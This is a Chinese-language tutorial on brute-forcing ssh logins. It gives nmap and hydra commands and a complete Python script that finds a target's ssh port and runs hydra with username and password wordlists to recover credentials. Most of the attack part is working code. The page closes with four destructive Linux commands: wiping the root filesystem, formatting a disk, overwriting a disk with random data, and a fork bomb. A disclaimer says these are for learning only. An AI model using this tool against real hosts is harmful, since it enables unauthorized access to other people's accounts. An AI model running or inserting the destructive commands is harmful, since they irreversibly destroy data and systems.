Python: ssh爆破篇

既然 MySQL 可以爆，那么 ssh 又未尝不可呢？

扫描+爆破

流程与爆MySQL时如出一辙

# The target is set once and reused by both commands below.
export TARGET="target.com"
# Port scan of the target. NOTE(review): $TARGET is unquoted here but quoted on the next line.
sudo nmap -sS -T4 -n -v $TARGET
# Password guessing against the ssh service. <port> is a placeholder — presumably the ssh port the scan above reported.
sudo hydra -L username.txt -P password.txt -s <port> "ssh://${TARGET}"

Hydra 的英文含义是九头蛇，暗示着它能像九头蛇一样灵活地针对不同的服务进行爆破

自动化

能自动化的东西就不要手动操作了

#!/usr/bin/env python3
import os
import re
import tempfile
import argparse

# ANSI SGR escape sequences for terminal colouring: bold red, bold bright green, and reset.
RED = '\x1b[1;31m'
GREEN = '\x1b[1;92m'
RESET = '\x1b[0m'

def scan(host):
    """Run nmap against *host* and return the port of the first output line mentioning "ssh".

    Args:
        host: hostname or IP address, passed straight through to nmap.

    Returns:
        The integer port parsed from the first nmap report line that contains
        "ssh", or None when no such line appears.

    Raises:
        AssertionError: if the parsed port is not within 1..65535.
    """
    print(f'{RED}==== 扫描开始 ===={RESET}')
    print(f'目标: {host}')
    # nmap writes its normal-format report (-oN) into the temporary file,
    # which is then read back through the same handle.
    with tempfile.NamedTemporaryFile('w+') as report:
        # NOTE(review): host is interpolated into a shell command string;
        # subprocess.run with an argument list would avoid shell parsing.
        os.system(f'nmap -sS -T4 -n -v -oN {report.name} {host}')
        report_text = report.read()
    ssh_line = re.search('.*ssh.*', report_text)
    if ssh_line is None:
        print('未发现ssh运行')
        return None
    # The matched line is assumed to begin with "<port>/..."; take the number before the slash.
    port = int(ssh_line.group(0).split('/')[0])
    print(f'{GREEN}发现ssh运行在端口{port}{RESET}')
    assert port in range(1, 65536)
    return port

def explode(host, port, user_fname, passwd_fname):
    """Run hydra against ssh on host:port and return the first credential pair it reports.

    Args:
        host: target hostname or IP address.
        port: ssh port, passed to hydra via -s.
        user_fname: path of the username wordlist (hydra -L).
        passwd_fname: path of the password wordlist (hydra -P).

    Returns:
        A (user, passwd) tuple taken from the first hydra output line containing
        "login:", or None when no such line appears.
    """
    print(f'{RED}==== 爆破开始 ===={RESET}')
    print(f'目标: {host}:{port}')
    with tempfile.NamedTemporaryFile('w+') as report:
        # NOTE(review): all four values are spliced into a shell string; an
        # argument list via subprocess.run would sidestep shell parsing.
        os.system(f'hydra -L "{user_fname}" -P "{passwd_fname}" -s {port} -t 4 ssh://{host} > {report.name}')
        report_text = report.read()
    hit = re.search(r'login:.+', report_text)
    if hit is None:
        print('爆破失败')
        return None
    # Whitespace-split the matched fragment; the tokens at index 1 and 3 are
    # taken as username and password respectively.
    fields = hit.group(0).split()
    user, passwd = fields[1], fields[3]
    print(f'{GREEN}爆破成功: 用户名 {user} 密码 {passwd}{RESET}')
    return (user, passwd)

def main():
    """CLI entry point: locate the ssh port with scan(), then hand it to explode().

    Exits with status -1 when either step returns None.
    """
    parser = argparse.ArgumentParser(description='Exploooosion!')
    parser.add_argument('host', type=str, help='target hostname or ip')
    parser.add_argument('-u', '--user-file', type=str, help='file for possible usernames')
    parser.add_argument('-p', '--passwd-file', type=str, help='file for possible passwords')
    args = parser.parse_args()

    port = scan(args.host)
    if port is None:
        exit(-1)
    creds = explode(args.host, port, args.user_file, args.passwd_file)
    if creds is None:
        exit(-1)
    # Unpacked for readability; the values are not used further here.
    username, passwd = creds

# Script guard: only run main() when executed directly, not when imported.
if __name__ == "__main__":
    main()
# Invocation of the script above (the page calls it "program"); $TARGET is the variable exported earlier.
sudo ./program $TARGET -u username.txt -p password.txt 

四大禁术

相传Linux上有四个毁天灭地的指令

# Four commands the page describes as destructive to a Linux host.
rm -rf --no-preserve-root /  # delete every file under the root directory

mkfs.ext /dev/${disk} # format the disk

dd if=/dev/urandom of=/dev/${disk} # keep writing random bytes over the disk until the system fails

:() { :|: & }; : # a process that keeps replicating itself, consuming IPC resources until they are exhausted

免责声明

以上内容仅供学习参考，本人不对读者使用上述指令直接或间接造成的破坏负责。